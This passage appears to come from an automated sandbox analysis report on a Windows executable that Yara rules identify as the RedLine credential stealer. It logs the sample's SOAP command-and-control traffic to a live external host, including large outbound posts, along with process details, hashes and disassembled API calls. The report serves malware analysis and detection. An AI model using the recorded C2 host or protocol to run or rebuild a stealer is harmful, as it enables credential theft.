Dec 24, 2024 09:07:24.336160898 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336230040 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336261034 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336268902 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336371899 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336380959 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336555958 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336565018 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336644888 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336702108 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336812973 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336822033 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336946964 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336976051 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337023973 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337032080 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337119102 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337127924 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337234974 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337243080 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337281942 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337290049 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337317944 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337326050 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337413073 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337420940 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337429047 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337522030 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337532997 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337542057 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337563992 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337573051 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337615013 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337622881 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337656975 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337665081 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337722063 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337729931 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337738991 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337816954 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337826014 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337830067 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337960005 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337968111 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.337980986 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.363615990 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:25.338746071 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:25.393944979 CET	49734	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:25.524681091 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:25.525629044 CET	49734	55615	192.168.2.4	185.222.58.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 09:07:15.776485920 CET	62317	53	192.168.2.4	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 09:07:15.776485920 CET	192.168.2.4	1.1.1.1	0x5d3	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 09:07:15.916311979 CET	1.1.1.1	192.168.2.4	0x5d3	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

185.222.58.90:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.222.58.90	55615	2368	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 09:07:08.943974972 CET	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.58.90:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Dec 24, 2024 09:07:10.170922995 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 24 Dec 2024 08:07:09 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Dec 24, 2024 09:07:15.229016066 CET	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.58.90:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Dec 24, 2024 09:07:15.649280071 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 9593 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 24 Dec 2024 08:07:15 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>45.137.22.172</b:string><b:string>116.30.125.86</b:string><b:string>27.151.156.216</b:string><b:string>223.74.112.220</b:string><b:string>120.85.244.196</b:string><b:string>113.119.26.13</b:string><b:string>125.114.60.149</b:string><b:string>122.239.112.188</b:string><b:string>38.102.188.133</b:string><b:string>183.16.101.185</b:string><b:string>60.179.8.111</b:string><b:string>27.11.95.143</b:string><b:string>113.118.224.149</b:string><b:string>211.90.250.107</b:string><b:string>14.218.27.17</b:string><b:string>14.216.91.87</b:string><b:string>113.119.26.13</b:string><b:string>120.225.98.244 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	185.222.58.90	55615	2368	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 09:07:19.971282005 CET	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.58.90:55615 Content-Length: 987905 Expect: 100-continue Accept-Encoding: gzip, deflate
Dec 24, 2024 09:07:22.630594969 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 24 Dec 2024 08:07:22 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	185.222.58.90	55615	2368	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 09:07:22.765211105 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.58.90:55615 Content-Length: 987897 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Dec 24, 2024 09:07:25.338746071 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 24 Dec 2024 08:07:25 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	03:07:02
Start date:	24/12/2024
Path:	C:\Users\user\Desktop\K3xL5Xy0XS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\K3xL5Xy0XS.exe"
Imagebase:	0x1c0000
File size:	1'058'304 bytes
MD5 hash:	6AFDD0CBDF70F3E75F423B1557648E85
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: infostealer_win_redline_strings, Description: Finds Redline samples based on characteristic strings, Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, Author: Sekoia.io Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:07:06
Start date:	24/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\K3xL5Xy0XS.exe"
Imagebase:	0x90000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:07:06
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0.9%
Signature Coverage:	4.8%
Total number of Nodes:	1956
Total number of Limit Nodes:	61

Executed Functions

Function 001C42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 001C430D

Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A

GetCurrentProcess.KERNEL32(?,0025CB64,00000000,?,?), ref: 001C4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 001C4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 001C4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001C4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 001C4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 001C447B
GetSystemInfo.KERNEL32(?,?,?), ref: 001C44A0

Strings

|O, xrefs: 002036F8
GetNativeSystemInfo, xrefs: 001C4460
kernel32.dll, xrefs: 001C444F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 3178a65e6072f8ecc8b5e1f739ff0d9895ecf01588fc3ef3ec491bfa75dca128
Instruction ID: 1bcb950255ff11b5445592e41f269954d70337c9b184e1240a78b3c98e19d72c
Opcode Fuzzy Hash: 3178a65e6072f8ecc8b5e1f739ff0d9895ecf01588fc3ef3ec491bfa75dca128
Instruction Fuzzy Hash: A3A1836591E3C2DFC716CBBB7C496A57FB86B36300B1854DEE44193A62D3308568CB2D

Function 001C42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001C50AA,?,?,00000000,00000000), ref: 001C42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001C50AA,?,?,00000000,00000000), ref: 001C42C9
LoadResource.KERNEL32(?,00000000,?,?,001C50AA,?,?,00000000,00000000,?,?,?,?,?,?,001C4F20), ref: 002035BE
SizeofResource.KERNEL32(?,00000000,?,?,001C50AA,?,?,00000000,00000000,?,?,?,?,?,?,001C4F20), ref: 002035D3
LockResource.KERNEL32(001C50AA,?,?,001C50AA,?,?,00000000,00000000,?,?,?,?,?,?,001C4F20,?), ref: 002035E6

Strings

SCRIPT, xrefs: 001C42BF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: d9ed4171fb28caf3811e57841b49b855aff4ea73ff314d0c2ff09f9063f307f3
Instruction ID: 4f77f5dfb070916a224390a03b874aee8f9f6e495c157482f4f222b7fd3740da
Opcode Fuzzy Hash: d9ed4171fb28caf3811e57841b49b855aff4ea73ff314d0c2ff09f9063f307f3
Instruction Fuzzy Hash: 31117C70200701BFD7218B65EC49F677BB9EBD5B52F20416DB846D62A0EB71D800D621

Function 00202BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 001C2B6B

Part of subcall function 001C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00291418,?,001C2E7F,?,?,?,00000000), ref: 001C3A78

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00282224), ref: 00202C10
ShellExecuteW.SHELL32(00000000,?,?,00282224), ref: 00202C17

Strings

runas, xrefs: 00202C0B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: efd84fa30af653424b5e650298d9b6f7cd731a91ddf2aeb7caee1a6e0bbaf409
Instruction ID: 2a63e728df6990bd688aad43aee223388ce3b6fa295390bba608b14be994ff1f
Opcode Fuzzy Hash: efd84fa30af653424b5e650298d9b6f7cd731a91ddf2aeb7caee1a6e0bbaf409
Instruction Fuzzy Hash: CD11B431208345ABC714FF60E855F7EB7A4ABB5300F44542DF052570A2DF30C96A8752

Function 0022DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00205222), ref: 0022DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0022DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0022DBEE
FindClose.KERNEL32(00000000), ref: 0022DBFA

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 1db6b55dd2c2ff5e36fdefb85b66d381113cce706d232a348ffe4b0b32f6d84c
Instruction ID: 76998a69e8800a0fd6fe73b316d56790087c1e6b8c7e19aecccea2301631f31e
Opcode Fuzzy Hash: 1db6b55dd2c2ff5e36fdefb85b66d381113cce706d232a348ffe4b0b32f6d84c
Instruction Fuzzy Hash: E9F0A730420B206B82206FBCBC0D46A376C9E01336B604703F835D10E0FBB05964C599

Function 001CBF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#), xrefs: 002107CE

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#)
API String ID: 3964851224-1470848591
Opcode ID: 7ee6d00b417633778de672fcad90752fde9b68509d0ec21c595be39c008b3df0
Instruction ID: abb936e9e8e0749ed875a696db4b58b898da8ec3c7b935b1b3e2ebe307bb6f10
Opcode Fuzzy Hash: 7ee6d00b417633778de672fcad90752fde9b68509d0ec21c595be39c008b3df0
Instruction Fuzzy Hash: 31A27970608341DFD714CF28C480B6ABBE1BFA9304F15896DE98A8B352D771ED95CB92

Function 001CD730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 001CD807
timeGetTime.WINMM ref: 001CDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001CDB28
TranslateMessage.USER32(?), ref: 001CDB7B
DispatchMessageW.USER32(?), ref: 001CDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001CDB9F
Sleep.KERNEL32(0000000A), ref: 001CDBB1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: c625339ab2ee04fd01d80801a341d889fa220c26086f2ebcaba9c408460dd9a3
Instruction ID: 55acb26d985cd7ec339e81921a74d97d4c81d97f615e49b8da3909ab1a562de2
Opcode Fuzzy Hash: c625339ab2ee04fd01d80801a341d889fa220c26086f2ebcaba9c408460dd9a3
Instruction Fuzzy Hash: 5E42E330618342EFD728CF24E849FAAB7E0BF66304F15456EF45587291D770E8A8CB92

Function 001C2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001C2D07
RegisterClassExW.USER32(00000030), ref: 001C2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001C2D42
InitCommonControlsEx.COMCTL32(?), ref: 001C2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001C2D6F
LoadIconW.USER32(000000A9), ref: 001C2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001C2D94

Strings

TaskbarCreated, xrefs: 001C2D37
0, xrefs: 001C2CE9
AutoIt v3 GUI, xrefs: 001C2D23
+, xrefs: 001C2CF0

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
